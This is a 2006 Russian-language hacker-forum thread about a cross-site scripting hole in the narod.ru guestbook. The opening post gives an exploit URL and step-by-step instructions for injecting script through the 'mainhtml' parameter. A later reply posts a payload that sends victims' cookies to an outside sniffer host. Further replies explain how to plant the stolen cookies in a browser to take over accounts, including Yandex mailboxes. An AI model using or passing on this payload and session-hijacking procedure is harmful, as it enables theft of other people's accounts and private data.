Xss народ.ру

Discussion in 'Уязвимости' started by bul.666, 5 Oct 2006.

Thread Status:
Not open for further replies.
  1. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    Не знаю было это или нет... Вообщем читаемс...

    1. _http://www.narod.ru/guestbook/?owner=49329156&mainhtml=%3Cscript%3Ealert()%3C/script%3E
    2. Создали себе сайт с гостевой книгой...
    Создайем на сайте файл - text.txt

    Зайходим в сорцы нашей гесты, копирусем все и вставляем в text.txt...

    Теперь надо нам просто добавить скрипт - ловушку, я добавил просто
    <script>alert(document.cookie);</script>...

    Правим сцылку... Первоночально сцылка на гесту показывает нам, что гостевуха в домене narod.ru, а значит там нам не будет показываться полные куки...
    Ну дык какая хрен разница? Исправим ейе на narod.yandex.ru...

    Теперь а чтоже делать с text.txt? Добавляем к ссылке на гесту &mainhtml=text.txt

    Теперь заходим по этой ссылке и видимс наши печенюшки =)))

    Извиняюсь, если это уже где то было... =))))

    Вот моя геста = _http://www.narod.yandex.ru/guestbook/?owner=49329156&mainhtml=text.txt

    Скажу сразу там нет снифера! =))))
     
    4 people like this.
  2. Murt@zaa

    Murt@zaa New Member

    Joined:
    27 Aug 2006
    Messages:
    18
    Likes Received:
    3
    Reputations:
    1
    Все круто но вот вопрос как примерно сделаь чтобы кукисы на сниффер отсылались? и еще, сижу я в мастерской и открываю твою ссылку мне выдаются кукисы моей страницы на народе. А если в это время сидеть в ящике от yandexa то выдадутся кукисы от ящика???
     
  3. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    Да! =)

    Code:
    <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
     
    1 person likes this.
  4. Murt@zaa

    Murt@zaa New Member

    Joined:
    27 Aug 2006
    Messages:
    18
    Likes Received:
    3
    Reputations:
    1
    Так как у меня ящика на яндексе нет задам еще вопрос куда вставлять полученные куки? в строку браузера ? типа id= *****полученные куки***** ???
     
  5. D=P=CH= MOD=

    D=P=CH= MOD= Elder - Старейшина

    Joined:
    15 Aug 2006
    Messages:
    249
    Likes Received:
    195
    Reputations:
    15
    Нет в строку браузера вобще то только сессию можно подставить.
    Куки подмени в текстовом файле, там где все твои куки. (пример: C:\Documents and Settings\...\Cookies)
    Или если там пароль не зашифрован, то просто впиши его.
     
    1 person likes this.
  6. Murt@zaa

    Murt@zaa New Member

    Joined:
    27 Aug 2006
    Messages:
    18
    Likes Received:
    3
    Reputations:
    1
    D=p=ch= Mod= Спасибо что напомнил! Помню читал где то давно, а щас забыл голова то дырявая. Ну че юзаем по тихоньку Xss :)
     
  7. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    Если ты пользователь Оперы, то заходи Инструменты->Дополнительно->Cookies...
    Находи домен яндекса и меняй значения... =))
     
  8. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    737
    Likes Received:
    336
    Reputations:
    215
    баян, было где-то с полгода назад. хсс глупость там есть вещи помощнее.
     
  9. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    SQL? PHPinj? Чеж не пользуешься? Или не продаж? Богатым станешь... Мы пока еще дети нам учиться и учиться...
     
  10. ground_zero

    ground_zero Elder - Старейшина

    Joined:
    11 Oct 2006
    Messages:
    398
    Likes Received:
    85
    Reputations:
    5
    необессутьте что вмешался но хотелосьбы продолжения темы чо там за штука помощьней ?
     
Thread Status:
Not open for further replies.